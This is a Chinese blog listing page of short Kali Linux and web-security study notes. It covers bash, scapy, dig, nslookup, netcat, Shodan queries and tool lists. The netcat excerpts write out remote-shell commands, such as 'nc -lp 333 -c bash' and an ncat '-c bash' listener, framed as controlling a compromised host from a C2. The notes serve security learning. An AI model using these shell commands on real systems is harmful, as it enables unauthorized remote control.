kali
关注
分享
扫一扫
Der_Traum
这个作者很懒,什么都没留下…
展开
-
7常见bash 命令
mount挂载镜像文件,类似于windows的虚拟光驱例子mount -o loop kali.ios /media/cdromdmesg专门用于查看message 文件的内容。可以省去输入路径find用来查找文件或者目录例子find / -name nmapfind 工具 从根 / 开始 查找 匹配名称 关键字是nmapfind / -ina原创 2017-03-28 21:24:24 · 257 阅读 · 0 评论 -
scapy
scapy: 用于抓包,修改包可单独使用,可作为python的库依赖:python_gnuplot使用例子:>>> arp = ARP() #调用ARP()函数,创建一个ARP类得实例>>> arp.display() #调用arp实例得一个方法,display,查看arp的参数###[ ARP ]### hwtype= 0x1 pt原创 2017-05-16 16:48:16 · 813 阅读 · 1 评论 -
DIG (类似nslookup)工具介绍
DIGdig www.baidu.com any @8.8.4.4==== dig 的有点 ====1. 可以更好的筛选输出的内容,减少不必要的输出,利于变成 例子 dig +noall +answer any baidu.com| awk '{print $5}' +noall 和+answer是参数root@kali:~# dig原创 2017-04-24 21:25:29 · 2382 阅读 · 0 评论 -
nslookup 使用方法简介
域名和FQDN的区别例子:域名=sina.comFQDN=www.sina.com;mail.sina.com常见的域名记录的类型有A: 主机记录 name-->IPCname: 别名记录 别名(类似于外号name)-->真正的域名NS:name server 的记录。记录的都是DNS服务器MX: 邮件服务器的记录PTR:反向域名解析 IP-->域名原创 2017-04-24 21:10:32 · 2388 阅读 · 0 评论 -
nc 的缺点
安全牛 web 安全笔记nc的一些缺点1. 没有加密,数据交换内容是明文,容易被监听2. 没有身份验证。当nc打开一个监听端口,任何人都可以链接3. ncat可以弥补nc的不足。ncat是nmap的组件。ncat可以产生一个加密的通道 A:ncat -c bash -allow 1.1.1.1 -vnl 333 -ssl B:ncat -nv 1.1原创 2017-04-22 21:46:02 · 1083 阅读 · 0 评论 -
nc 远程控制
=== nc 做远程控制 ===原理实际上和之前的传文本一样,服务器端起监听,客户端端去链接,之后监听的服务器端传一个自己的shell过去到客户端正向:侦听方为肉鸡,C2 访问肉鸡SERVER: nc -lp 333 -c bashCLIENT: nc -nv 1.1.1.1 333 或者反向:侦听方为C2,肉鸡访问C2SERVER :nc -lp原创 2017-04-20 23:14:44 · 2617 阅读 · 0 评论 -
nc 使用方法
安全牛web安全笔记=== NC ===nc 在做传输的时候可以被认为是一个简单的管道,可以直接传输输入其中的内同到被监听的端口。作用类似管道符 |cat xxx.mp4 | nc -lp 333读取xxx.mp4,然后送进管道开启一个nc进程,通过333进行通讯将管道中的xxx.mp4,作为输入,发送给nc的进程。nc会通过自己的端口333向外输出。原创 2017-04-20 21:52:24 · 1886 阅读 · 0 评论 -
netcat
netcat的使用方法简介NC能做的事情----取代telnet--------nc -nv 1.1.1.1 110--------nc -nv ip port----传输文本信息和文件/目录----加密的传输文件----远程控制/可以作为木马----机密所有的流量----做流媒体服务器----远程克隆硬盘原创 2017-04-16 22:04:29 · 250 阅读 · 0 评论 -
Shodan
shodan 是一个专门搜索联网的设备的网站。需要登录使用。https://shodan.io例子:port:554 has_screenshot:truenetsreen port:22 contry:CN city:Beijing原创 2017-04-16 20:53:30 · 463 阅读 · 0 评论 -
web 安全 浏览器插件
flashgotautoproxytamper datacokkie importercookies manageruser agentswitcherhackbarlive http headerfirebugdownload youtube videos as MP4flagfoxhashrhttps://addons.mozilla.org原创 2017-03-31 17:51:06 · 612 阅读 · 0 评论 -
web 安全 kali 常用软件
flashplugin-nonfree gdebi 图形化安装deb包amule 电驴qbittorrent btgeany 一个多语言的开发环境stardict 英文字典meld 类似于beyond compare。比较两个文件差异的图形化工具ttf-wqy-microhei windows常用的字体kchmviewer 打开chm文件的freemindn原创 2017-03-31 17:50:13 · 397 阅读 · 0 评论 -
9web安全
配置网卡dhcpclient eth 0ifconfig eth0 x.x.x.x/x配置路由route add default gw 192.168.1.1?? netstat -nr route add -net 172.16.0.0/24 gw 192.168.1.100 eth0配置DNS 服务器nameserver/etc/resolv原创 2017-03-29 17:36:56 · 191 阅读 · 0 评论 -
8常见bash
& 和 &&命令1 & 命令2命令1执行完了执行命令2命令1 && 命令2命令1执行完了,并且成功了,执行命令2命令1 || 命令2命令1执行不成功,再执行第二个命令shell 脚本#!/bin/bashfor n in "seq 254"do ping 192.168.1.$n -c 1 |grep ttl | awk '{print $4}'原创 2017-03-28 21:44:05 · 294 阅读 · 0 评论 -
shodan
shodan.io语法keword:valuenet:8.8.8.8net:8.8.8.0/24country:CNcity:Beijingcisco tianjinapache beijingkeywords=net;port;country;city;os;org;geo;product;isp;hostname;https://tieba.baid原创 2017-04-26 21:16:35 · 378 阅读 · 0 评论